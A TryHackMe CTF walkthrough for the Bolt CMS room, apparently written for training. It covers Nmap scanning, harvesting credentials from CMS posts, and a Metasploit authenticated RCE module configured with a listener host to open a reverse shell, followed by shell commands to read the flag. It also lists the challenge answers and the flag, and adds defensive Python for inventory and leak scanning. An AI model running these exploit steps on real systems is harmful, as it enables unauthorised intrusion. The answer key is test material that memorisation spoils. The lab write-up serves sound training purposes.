
TryHackMe Bolt CTF Walkthrough
Master advanced techniques and methodologies in CTF challenges
Introduction
The Bolt CTF is a beginner-friendly challenge on TryHackMe that focuses on web exploitation and basic penetration testing skills. This walkthrough will guide you through each step of compromising the target machine.
This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution.
Reconnaissance
Let's start by enumerating the services running on the machine with Nmap:
sudo nmap -sC -sV 10.10.163.6

-sC: Runs Nmap's default scripts (NSE default category). Useful for quick enumeration.
-sV: Detects service versions running on open ports.
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open http (PHP 7.2.32-1)

Nmap reveals 3 open ports, and Bolt CMS is running on port 8000.
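From a defender's side, the same Nmap service lines are the raw material for an asset inventory: a web server on a port other than 80/443 is exactly the kind of thing that escapes routine patching. The following Python is an added example (not part of the original walkthrough) that parses the three service lines quoted above, constructed here as sample input, and flags web services listening on non-standard ports. The set of "standard" ports is an assumption chosen for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample: the three lines Nmap reported in the walkthrough.
NMAP_OUTPUT = """\
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open http (PHP 7.2.32-1)
"""

# port/proto  state  service  [version text]
LINE_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)

# Assumed baseline for the example: which ports are "expected" per service.
STANDARD_PORTS = {"http": {80}, "https": {443}, "ssh": {22}}


@dataclass
class Service:
    port: int
    proto: str
    state: str
    service: str
    version: str


def parse_nmap(text):
    """Turn Nmap's normal-output service lines into Service records."""
    services = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip headers, blank lines, or anything else
        services.append(Service(
            int(m["port"]), m["proto"], m["state"], m["service"],
            (m["version"] or "").strip(),
        ))
    return services


def web_services(services):
    """Every HTTP/HTTPS listener, regardless of port."""
    return [s for s in services if s.service in ("http", "https")]


def nonstandard_ports(services):
    """Listeners whose port is outside the expected set for that service."""
    return [s for s in services
            if s.port not in STANDARD_PORTS.get(s.service, set())]


if __name__ == "__main__":
    inventory = parse_nmap(NMAP_OUTPUT)
    for s in nonstandard_ports(inventory):
        print(f"review: {s.service} on {s.port}/{s.proto} ({s.version})")
```

Run against the sample, it reports only the PHP listener on 8000/tcp, the one hosting the CMS; in practice the same parser would be pointed at saved Nmap output from a scheduled scan of your own hosts.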
Question 1: What port number has a web server with a CMS running?
Answer: 8000
Web Application Analysis
Browsing the CMS on port 8000 reveals a message from Jake Admin that discloses his username:
Hello Everyone,
Welcome to this site, myself Jake and my username is bolt. I am still new to this CMS so it can take a while for me to get used to this CMS but believe me I have some great content coming up for you all!
Regards,
Jake Admin

Question 2: What is the username we can find in the CMS?
Answer: bolt
Question 3: What is the password we can find for the username?
In another post, the password is also revealed:
Message for IT Department
Hey guys,
I suppose this is our secret forum right? I posted my first message for our readers today but there seems to be a lot of freespace out there. Please check it out! my password is boltadmin123 just in case you need it!
Regards,
Jake Admin

Answer: boltadmin123
Exploitation
Let's authenticate against the admin interface at http://10.10.177.138:8000/bolt/login with the credentials gathered previously.
Question 4: What version of the CMS is installed on the server?
The version is disclosed in the bottom left corner.
Answer: bolt 3.7.1
Question 5: There's an exploit for a previous version of this CMS
Using searchsploit, we can find an "Authenticated Remote Code Execution" exploit:
searchsploit bolt

Answer: 48296
Question 6: Metasploit exploit path
Answer: exploit/unix/webapp/bolt_authenticated_rce
Gaining Shell Access
msfconsole -q
use exploit/unix/webapp/bolt_authenticated_rce
set rhost 10.10.13.119
set username bolt
set password boltadmin123
set lhost 10.8.50.72
exploit

Privilege Escalation
After getting shell access, search for the flag:
SHELL=/bin/bash script -q /dev/null
whoami
cd /home
ls -la
cat flag.txt

Question 7: Look for flag.txt inside the machine
Answer: THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}
Conclusion
This CTF demonstrates the importance of:
- Not exposing credentials in public-facing content
- Keeping CMS software up to date
- Proper access controls and authentication
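The first two points above can be turned into automated checks. The following Python is an added example (not code from the original walkthrough or from the Bolt project) that scans published CMS posts for credential disclosures of the kind Jake made, and compares an installed version string against a minimum patched version. The three posts are constructed for the example, modelled on the two messages quoted earlier plus one harmless post, and the baseline version "3.7.1" is an assumed placeholder rather than a statement about which Bolt release fixed the issue.

```python
import re

# Constructed sample posts modelled on the walkthrough's messages.
POSTS = [
    {"title": "Hello Everyone",
     "body": "Welcome to this site, myself Jake and my username is bolt. "
             "I am still new to this CMS."},
    {"title": "Message for IT Department",
     "body": "I suppose this is our secret forum right? my password is "
             "boltadmin123 just in case you need it!"},
    {"title": "Weekly update",
     "body": "The new theme is live, check the login page when you get a chance."},
]

# Phrases that typically precede a disclosed credential. The trailing
# token is captured and punctuation is trimmed ("bolt." -> "bolt").
CREDENTIAL_PATTERNS = [
    ("username", re.compile(
        r"\b(?:my\s+)?(?:user\s*name|login)\s*(?:is|:)\s*(\S+)", re.I)),
    ("password", re.compile(
        r"\b(?:my\s+)?(?:password|passwd|pwd)\s*(?:is|:)\s*(\S+)", re.I)),
]


def scan_posts(posts):
    """Return one finding per credential-looking phrase in public content."""
    findings = []
    for post in posts:
        for kind, pattern in CREDENTIAL_PATTERNS:
            for m in pattern.finditer(post["body"]):
                findings.append({
                    "title": post["title"],
                    "kind": kind,
                    "value": m.group(1).rstrip(".,;:!?"),
                })
    return findings


def parse_version(text):
    """Extract a comparable numeric tuple from strings like 'bolt 3.7.1'."""
    return tuple(int(n) for n in re.findall(r"\d+", text))


def is_outdated(installed, minimum_patched):
    """True when the installed version is older than the assumed baseline."""
    return parse_version(installed) < parse_version(minimum_patched)


if __name__ == "__main__":
    for f in scan_posts(POSTS):
        print(f"{f['kind']} disclosed in '{f['title']}': {f['value']}")
    # "3.7.1" is a placeholder baseline for the example, not a fixed version.
    print("outdated:", is_outdated("bolt 3.7.1", "3.7.1"))
```

Run against the samples, the scanner reports the username from the first post and the password from the second, and nothing from the third, because "login page" is not followed by "is" or a colon. The version check treats the CMS's own "bolt 3.7.1" footer string as input, so the same function works on whatever version banner a site exposes.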